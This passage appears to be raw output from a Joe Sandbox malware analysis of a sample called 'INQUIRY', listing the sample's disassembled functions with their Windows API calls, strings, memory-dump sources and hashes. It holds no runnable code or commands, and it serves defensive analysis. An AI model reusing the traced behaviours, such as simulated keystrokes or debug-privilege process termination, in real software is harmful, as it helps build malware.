                                                                                              • Instruction ID: 4b75924ddda70174eafb452e32f3ce58e3ba1a181f90630aab52e8a2193b19ed
                                                                                              • Opcode Fuzzy Hash: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
                                                                                              • Instruction Fuzzy Hash: 82515A74A05209AFDB20DF64CC45FAA77B5EB58321F104529F906DB290DBB0EDA1EB90
                                                                                              Function 00A6966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A6A84C
                                                                                                • Part of subcall function 00A6A82C: GetCurrentThreadId.KERNEL32 ref: 00A6A853
                                                                                                • Part of subcall function 00A6A82C: AttachThreadInput.USER32(00000000,?,00A69683,?,00000001), ref: 00A6A85A
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A6968E
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A696AB
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A696AE
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696B7
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A696D5
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696D8
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696E1
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A696F8
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
                                                                                              • Instruction ID: 8e5518840fddc0a98a32a74eb38c1b38dde55e6ab6245a53896b407dd6a7b743
                                                                                              • Opcode Fuzzy Hash: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
                                                                                              • Instruction Fuzzy Hash: D111A571A50618BEF610AFA0DC49F6A7B2DDB4C751F210426F344EB0A1CDF25C51DAE4
                                                                                              Function 00A68921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A6853C,00000B00,?,?), ref: 00A6892A
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68931
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68946
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00A6853C,00000B00,?,?), ref: 00A6894E
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68951
                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68961
                                                                                              • GetCurrentProcess.KERNEL32(00A6853C,00000000,?,00A6853C,00000B00,?,?), ref: 00A68969
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A6896C
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00A68992,00000000,00000000,00000000), ref: 00A68986
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
                                                                                              • Instruction ID: ce75455bbbc6ec68facd44359ca3170d355941cd8dadfbfa2439e8b2e1054b35
                                                                                              • Opcode Fuzzy Hash: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
                                                                                              • Instruction Fuzzy Hash: A401A8B5340308FFEA10EBA5DC49F6B3BACEB89711F508522FB05DB1A1CA7498018A64
                                                                                              Function 00A89B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: 2e0b747efca39109aad2dd0ff0ae56c4b0d3f6c4ece08b91fbcc9e8074a2a888
                                                                                              • Instruction ID: 172883ce6023e519751eafc0d9ceaaf50174efe83b1493d5c89fdc7f796a56eb
                                                                                              • Opcode Fuzzy Hash: 2e0b747efca39109aad2dd0ff0ae56c4b0d3f6c4ece08b91fbcc9e8074a2a888
                                                                                              • Instruction Fuzzy Hash: 90C17171A002199FDF10EFA8D984BBFB7F5FB48354F188469E905AB280E7719D45CB90
                                                                                              Function 00A89113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$_memset
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2862541840-625585964
                                                                                              • Opcode ID: 2ccab14fca106b930b64b258d95259a6c538315347089591fe1b9bb10580fb8c
                                                                                              • Instruction ID: 913aeb16ae5bfd1c808f1877236aab283c8981618316f6ee4ecfe3c058c238de
                                                                                              • Opcode Fuzzy Hash: 2ccab14fca106b930b64b258d95259a6c538315347089591fe1b9bb10580fb8c
                                                                                              • Instruction Fuzzy Hash: 06918B71A00219ABDF24EFA5C848FEFBBB8EF85710F14855DF515AB280D7709945CBA0
                                                                                              Function 00A8975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
                                                                                                • Part of subcall function 00A6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
                                                                                                • Part of subcall function 00A6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
                                                                                                • Part of subcall function 00A6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A89806
                                                                                              • _memset.LIBCMT ref: 00A89813
                                                                                              • _memset.LIBCMT ref: 00A89956
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A89982
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00A8998D
                                                                                              Strings
                                                                                              • NULL Pointer assignment, xrefs: 00A899DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 1300414916-2785691316
                                                                                              • Opcode ID: 4dd437d06c00cd11e3fedc0834687bd58106c83adab82c14d9786c989318edc4
                                                                                              • Instruction ID: 19bed931f3508a149fc159afc112f24eb6497156b5f389485f487d225e6b8781
                                                                                              • Opcode Fuzzy Hash: 4dd437d06c00cd11e3fedc0834687bd58106c83adab82c14d9786c989318edc4
                                                                                              • Instruction Fuzzy Hash: 80913871D00229EBDB10EFA4DD84EEEBBB9BF08350F10415AF419A7291DB719A45CFA0
                                                                                              Function 00A96D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A96E24
                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00A96E38
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A96E52
                                                                                              • _wcscat.LIBCMT ref: 00A96EAD
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A96EC4
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A96EF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 307300125-78025650
                                                                                              • Opcode ID: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
                                                                                              • Instruction ID: 10721924e1a63bcae014e737fe8375cb53fb598beb121a81852a84bd796c858d
                                                                                              • Opcode Fuzzy Hash: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
                                                                                              • Instruction Fuzzy Hash: 58419E75B00348AFEF21DFA4CC85BEAB7E8EF08350F10082AF595E7291D6719D858B60
                                                                                              Function 00A8E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00A73C7A
                                                                                                • Part of subcall function 00A73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00A73C88
                                                                                                • Part of subcall function 00A73C55: CloseHandle.KERNEL32(00000000), ref: 00A73D52
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9A4
                                                                                              • GetLastError.KERNEL32 ref: 00A8E9B7
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9E6
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A8EA63
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00A8EA6E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A8EAA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: 66bad08325b9ba7ee207166c561482440e93e1e2fc0f0547914bb592add5b6ae
                                                                                              • Instruction ID: 277310df864bf74a7b0e7f35d9c875f29d55d0d7fd0767bed6c464fe0fc8eb64
                                                                                              • Opcode Fuzzy Hash: 66bad08325b9ba7ee207166c561482440e93e1e2fc0f0547914bb592add5b6ae
                                                                                              • Instruction Fuzzy Hash: 3B41CB713002009FDB14EF64CDA6FAEBBA5AF81754F148429F9069F2D2CBB4A845CB95
                                                                                              Function 00A72F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00A73033
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-404129466
                                                                                              • Opcode ID: 6b8df6fc493d8342b35f4f9d8f62093ad125857f0e8f9b61e34d6ab3a5281987
                                                                                              • Instruction ID: a21c8c3cc84e6b5dc0a6f92b7c478e65906cb9175c2b723b49fd1160670cdc6c
                                                                                              • Opcode Fuzzy Hash: 6b8df6fc493d8342b35f4f9d8f62093ad125857f0e8f9b61e34d6ab3a5281987
                                                                                              • Instruction Fuzzy Hash: 3E112E3334834ABEDB149B54DC42E6B7BACAF15320F21C06FF908A6181DBB45F4166A0
                                                                                              Function 00A742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A74312
                                                                                              • LoadStringW.USER32(00000000), ref: 00A74319
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A7432F
                                                                                              • LoadStringW.USER32(00000000), ref: 00A74336
                                                                                              • _wprintf.LIBCMT ref: 00A7435C
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7437A
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00A74357
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
                                                                                              • Opcode ID: 2c5b39e7a549ddca077aa9b82565a56077867dbdc2db10b0b46fe3369c8f2e55
                                                                                              • Instruction ID: a38c12df3ffd156ee300748469dbf68f7b5c880124a338715e9657ae4d357baa
                                                                                              • Opcode Fuzzy Hash: 2c5b39e7a549ddca077aa9b82565a56077867dbdc2db10b0b46fe3369c8f2e55
                                                                                              • Instruction Fuzzy Hash: AF0162F7A04208BFE711D7E0DD89EF6776CEB08301F1045A6B749E6051EA745E854B71
                                                                                              Function 00A9D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A9D47C
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00A9D49C
                                                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A9D6D7
                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A9D6F5
                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A9D716
                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00A9D735
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A9D75A
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00A9D77D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                              • String ID:
                                                                                              • API String ID: 1211466189-0
                                                                                              • Opcode ID: ed553b1ade20af0f866efc471d244b4e8f600ffff6d332ce499094697bd71735
                                                                                              • Instruction ID: 43754bc89c8f49ebbbdc7d82673d353dc65ad0f35834fd90b9a14646c236d62c
                                                                                              • Opcode Fuzzy Hash: ed553b1ade20af0f866efc471d244b4e8f600ffff6d332ce499094697bd71735
                                                                                              • Instruction Fuzzy Hash: F4B17975A00225AFDF14CFA8C9C57AD7BF1BF04701F098069ED48AF295DB34A990CBA0
                                                                                              Function 00A12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A12ACF
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00A12B17
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C21A
                                                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A4C1C7,00000004,00000000,00000000,00000000), ref: 00A4C286
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: ec9ef4d93804e5fefade9c58d3ef611234e5875cfe6bf2aafbf5aca6ab7b1b26
                                                                                              • Instruction ID: c13c81ab82e3aacd88999cbb788fb8024474d76ddd286aa74c2a3843fd5ea18e
                                                                                              • Opcode Fuzzy Hash: ec9ef4d93804e5fefade9c58d3ef611234e5875cfe6bf2aafbf5aca6ab7b1b26
                                                                                              • Instruction Fuzzy Hash: 31413E347097C09FDB759B688CC8BEB7BA6AF85350F14841EE14786560D6B0D8E2D720
                                                                                              Function 00A770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A770DD
                                                                                                • Part of subcall function 00A30DB6: std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                                • Part of subcall function 00A30DB6: __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A77114
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A77130
                                                                                              • _memmove.LIBCMT ref: 00A7717E
                                                                                              • _memmove.LIBCMT ref: 00A7719B
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A771AA
                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A771BF
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A771DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 256516436-0
                                                                                              • Opcode ID: 98179ed01516a4bf0cea749c803b24a485b0f50427dc8e19ea211ae64d0bb3ff
                                                                                              • Instruction ID: 184f9b3cdc8df1ec6c1fdcc5c2ffb9ffbf13fd58371012ab5cde7a9d9da9a47d
                                                                                              • Opcode Fuzzy Hash: 98179ed01516a4bf0cea749c803b24a485b0f50427dc8e19ea211ae64d0bb3ff
                                                                                              • Instruction Fuzzy Hash: AF314D71A00205EFDF00DFA5DD85EAEB7B8EF45710F2581A6F9049A256DB30AA11CBA0
                                                                                              Function 00A961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A961EB
                                                                                              • GetDC.USER32(00000000), ref: 00A961F3
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A961FE
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A9620A
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A96246
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A96257
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A96291
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A962B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
